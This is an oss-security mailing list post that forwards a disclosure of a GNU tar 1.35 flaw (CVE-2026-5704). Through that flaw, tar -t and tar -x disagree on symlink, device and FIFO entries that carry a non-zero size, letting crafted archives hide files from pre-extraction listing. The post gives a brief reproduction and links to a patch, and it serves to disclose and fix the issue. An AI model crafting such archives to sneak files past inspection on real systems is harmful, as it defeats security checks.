Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <e9445380-c50f-4385-93fb-02fbeec634af@oracle.com>
Date: Sat, 11 Apr 2026 10:10:20 -0700
From: Alan Coopersmith <alan.coopersmith@...cle.com>
To: oss-security@...ts.openwall.com
Subject: GNU tar: listing/extraction desynchronization allows
 hidden file injection

https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00007.html disclosed:
> From: 	 Guillermo de Angel
> Subject: GNU tar: listing/extraction desynchronization allows hidden file injection (tar -t vs tar -x)
> Date: 	 Wed, 18 Mar 2026 15:55:41 +0100
> 
> Hello,
> 
> I am reporting a security issue in GNU tar 1.35 where tar -t and tar -x produce
> different results when processing archives containing non-data-bearing typeflags
> (symlink, chardev, blockdev, FIFO) with a non-zero size field.
> 
> Summary:
> 
>  - tar -t respects the size field and skips the data blocks
>  - tar -x ignores the size field and parses the data blocks as headers
>  - Result: files embedded in the data region are invisible to listing but are
>    created on disk during extraction
> 
> This enables hidden file injection: an attacker can craft a small archive
> (< 3 KB) where tar -t reports N entries but tar -x creates N+M files.
> 
> Any security workflow that relies on tar -t for pre-extraction inspection will
> have an incomplete view of the archive contents.
> 
> Reproduction (GNU tar 1.35, Ubuntu 24.04):
> 
> $ tar -tf desync_chardev.tar
> carrier_entry
> marker.txt
> 
> $ mkdir /tmp/test && tar -xf desync_chardev.tar -C /tmp/test
> $ ls /tmp/test/
> carrier_entry injected.txt marker.txt
> ^^^^^^^^^^^^
> not in listing
> 
> bsdtar 3.7.2 is consistent in both modes (lists and extracts all 3 entries).
> 
> Affected typeflags: '2' (symlink), '3' (chardev), '4' (blockdev), '6' (FIFO).
> Typeflag '5' (directory) is not affected.
> 
> I have attached:
> 
> 1. Full advisory with root cause analysis and impact assessment
> 2. Standalone PoC generator (Python 3, no dependencies)
> 3. Four minimal PoC archives (one per affected typeflag)
> 
> I am happy to coordinate on a disclosure timeline. Please let me know if you
> need additional information or testing.
> 
> Regards,
> 
> Guillermo de Angel

Red Hat appears to have assigned CVE-2026-5704 to this issue.

Paul Eggert provided a patch in
https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00011.html
which is also available in
https://cgit.git.savannah.gnu.org/cgit/tar.git/commit/?id=b8d8a61b25588caca4efaf9bdd2e3f1a49da77e3

https://lists.gnu.org/archive/html/bug-tar/2026-03/msg00012.html points out
that a similar report was also included in
https://lists.gnu.org/archive/html/bug-tar/2026-02/msg00022.html
along with a number of other bug reports.

-- 
         -Alan Coopersmith-                 alan.coopersmith@...cle.com
          Oracle Solaris Engineering - https://blogs.oracle.com/solaris

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.